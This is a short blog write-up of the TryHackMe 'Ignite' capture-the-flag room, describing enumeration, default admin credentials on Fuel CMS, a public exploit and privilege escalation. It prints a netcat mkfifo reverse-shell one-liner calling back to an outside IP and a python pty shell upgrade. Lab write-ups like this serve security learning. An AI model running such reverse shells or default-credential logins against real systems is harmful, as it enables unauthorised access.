security portfolio + blog

by Nicholas Coleman

Download as .zip Download as .tar.gz View on GitHub
12 April 2025

Ignite

by Nicholas Coleman

Info

IP: 10.10.233.34

Nmap

nmap

Website:

site

Gobuster:

gobuster

Exploits:

exploit

Since the admin did not change their default password, it seems I can just login without having to brute force anything, or figure it out.

The admin page is located at: http://10.10.233.34/fuel

This brings me to a CMS, where there is very little information.

I decide to now just try out an exploit I found called FuelCMS which grants me a reverse shell.

shell

Bingo!

bingo

I was able to find the user.txt flag pretty easily.

Looking around, I was able to find a database file:

10

Root user found! Now I have to escalate.

rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.6.25.18 4242 > /tmp/f

This spawns a terminal so that I can login to root. It is available because Python is enabled.

python -c 'import pty; pty.spawn("/bin/sh")'

final

tags: tryhackme